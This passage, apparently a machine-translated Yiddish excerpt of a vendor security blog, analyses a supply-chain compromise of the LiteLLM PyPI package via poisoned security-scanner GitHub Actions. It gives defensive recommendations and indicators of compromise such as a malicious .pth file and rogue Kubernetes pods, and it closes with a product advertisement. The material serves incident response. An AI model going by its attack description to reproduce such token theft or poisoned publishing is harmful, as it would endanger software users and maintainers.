  • שפּילקע CI/CD אַקשאַנז דורך commit SHA, נישט טאַג. לייטעלם'ס pipeline גענוצט טריווי אָן אַ פּינד ווערסיע. אויב עס וואָלט רעפערענצירט aquasecurity/trivy-action@<commit-sha> אַנשטאָט פון @latest, די קאָמפּראָמיטירטע אַקציע וואָלט נישט אויסגעפירט געוואָרן.
  • ניצט קורץ-לעבעדיגע, באגרענעצטע ארויסגעבונג טאָקענס. PyPI שטיצט טראַסטיד פּובלישערס (OIDC-באזירט) און סקאָופּט API טאָקענס. די עקספילטרירטע PYPI_PUBLISH טאָקען זאָל נישט האָבן געהאַט לאַנג-לעבעדיקן, אַנריסטריקטידן פּובליקאַציע אַקסעס.
  • אקטיוויזירן צוויי-פאקטאר אויטענטיפיקאציע אויף PyPI. פארלאנגען 2FA פאר אלע אויפהאלטערס און ניצן הארדווער זיכערהייט שליסלען וואו מעגליך.
  • אונטערשרייבן פּעקלעך. סיגסטאָר/PEP 740 אַטעסטאַציעס לאָזן קאָנסומערס באַשטעטיקן אַז אַ פּעקל איז געבויט געוואָרן לויטן ערוואַרטעטן צושטאַנד. CI/CD pipeline, נישט דורך אַן אַטאַקירער מיט אַ געגנבעטן טאָקען.

פֿאַר פּלאַטפאָרמע אָפּעראַטאָרן (PyPI, npm, GitHub)

  • דעטעקטירן אַנאַמאַלישע פּובליקאַציע פּאַטערנז. צוויי נייע ווערסיעס ארויסגעגעבן 13 מינוט איינער פון די אנדערע, פון אן אנדער IP אדער טאָקען ווי געווענליך, זאלן אויסלעזן א "האלט-פאר-איבערבליק" אדער אן אויטאמאטישע סקענירונג איידער דער פעקל ווערט אינסטאלירבאר.
  • פאַרגיכערן די אַדאַפּשאַן פון טראַסטיד פּובלישערס. OIDC-באזירטע פובליקאציע פארבינדט פעקלעך צו ספעציפישע רעפאזיטאריעס און ארבעטספלאָוז, מאכנדיג גע'גנב'עטע טאוקענס אומניצלעך אינדרויסן פון דעם ארגינעלן. CI/CD קאָנטעקסט.
  • אימפלעמענטירן פּובליק-צייט מאַלוואַרע סקאַנינג. די base64-דעקאָדירטע פּיילאָוד אין proxy_server.py וואָלט זיין דעטעקטאַבאַל דורך סטאַטישע אַנאַליז ביים פּובליקירן צייט.

פֿאַר דער עקאָסיסטעם

  • באַהאַנדלט זיכערהייט מכשירים ווי קריטישע אינפראַסטרוקטור. טריווי און טשעקמארקס קי-אי-סי-עס ווערן גענוצט דורך מיליאנען pipelineזייערע גיטהאב אקציעס זאלן זיין אונטערגעשריבן, געפינדן, און מאָניטאָרירט מיט דער זעלבער שטרענגקייט ווי די פּאַקאַדזשאַז וואָס זיי סקענען.
  • אינוועסטירן אין ראַנטיים דיטעקשאַן. סטאַטישע אַנאַליז אַליין קען נישט כאַפּן יעדע פֿאַרבלענדונג טעכניק. ראַנטיים מאָניטאָרינג פון פּאַקעט ינסטאַלירונג hooks, אומגעריכטע נעץ פֿאַרבינדונגען, און פֿאַרדעכטיקע טעקע צוטריט מוסטערן גיט פֿאַרטיידיקונג אין טיפֿקייט.
  • טיילן סאַקאָנע אינטעליגענץ שנעלער. די 5.5-שעה עקספּאָוזשער פֿענצטער פֿאַר ליטעלם וואָלט געקענט זײַן קירצער מיט שנעלערער קראָס-ווענדאָר קאָאָרדינאַציע. אויטאָמאַטישע סקאַנינג סערוויסעס ווי קסיגעני MEW, סאָקעט, און סניק האָבן דעטעקטירט די אַנאָמאַליע — די שווערסטע זאַך איז מענטשלעכע באַשטעטיקונג און רעגיסטרי ענטפֿער צײַט.

סאָף

די TeamPCP קאמפיין איז א וואסערשייד מאמענט פאר software supply chain securityדורך קאָמפּראָמיטירן זיכערהייט סקאַנערס ערשט און זיי ניצן ווי טרעפּלשטיינער צו הויך-ווערטיקער קינסטלעכער אינפראַסטרוקטור, האָבן די אַטאַקירער דעמאָנסטרירט אַז די צושטעל קייט איז נאָר אַזוי שטאַרק ווי איר שוואַכסטע טראַנזיטיווע אָפּהענגיקייט, און אַז אָפּהענגיקייט קען זיין די זיכערהייט געצייַג וואָס איר טראַסט צו האַלטן איר זיכער.

דער ליטלעם קאמפראמיס אונטערשטרייכט ספעציפיש דעם וואקסנדיקן ריזיקע פאר קינסטלעכער אינפראַסטרוקטור. ווי LLM פראקסי גייטווייז ווערן די standard מוסטער פֿאַר enterprise מיט קינסטלעכער אינטעליגענץ דעפּלוימענט, קאָנצענטרירן זיי צוטריט צו API שליסלען, וואָלקן קראַדענטשאַלז, און סענסיטיווע דאַטן אין איין קאָמפּאָנענט. קאָמפּראָמיטירן יענעם קאָמפּאָנענט איז אַ סקעלעט שליסל צום גאַנצן קינסטלעכער אינטעליגענץ סטאַק.

אָרגאַניזאַציעס וואָס האָבן אינסטאַלירט ליטעלם 1.82.7 אָדער 1.82.8 בעת דעם 5.5-שעה פֿענצטער זאָלן דאָס באַהאַנדלען ווי אַ פולשטענדיקע קרעדענשאַל קאָמפּראָמיס: ראָטירן אַלע סודות אויף אַפעקטירטע סיסטעמען, אָדיטירן קובערנעטעס קלאַסטערס פֿאַר node-setup-* פּאָדס אין kube-system, אַראָפּנעמען יעדן sysmon.service סיסטעםד איינהייטן, און טשעק פאר litellm_init.pth אין פּיטהאָן site-packages/ דירעקטאָריעס. באַניצער פון די אָפיציעלער דאָקער בילד (ghcr.io/berriai/litellm) זענען נישט געווען באאיינפלוסט, ווייל דאס בילד האט געפֿעסט זיינע אָפּהענגיקייטן און איז נישט איבערגעבויט געוואָרן בעת ​​דעם עקספּאָזישאַן פֿענצטער.

וועגן די מחבר

קאָ-גרינדער & קטאָ

לויס ראַדריגעז איז מיט-גרינדער און CTO ביי Xygeni Security. מיט 20+ יאר אין אפליקאציע זיכערהייט, פאקוסירט ער אויף AppSec שוץ און פארגעשריטענע קאוד-אנאליז מעגלעכקייטן וואס העלפן טימס רעדוצירן עכטע דעליווערי ריזיקע.

 
סקאַ-טולס-סאָפֿטווער-קאָמפּאָזיציע-אַנאַליז-טולס
פּריאָריטיזירן, פאַרריכטן און זיכערן אייערע ווייכווארג ריזיקעס
באַקומען דיין פריי חשבון.
קיין קרעדיט קאַרטל פארלאנגט.

זיכערן אייער ווייכווארג אנטוויקלונג און ליפערונג

מיט Xygeni פּראָדוקט סוויט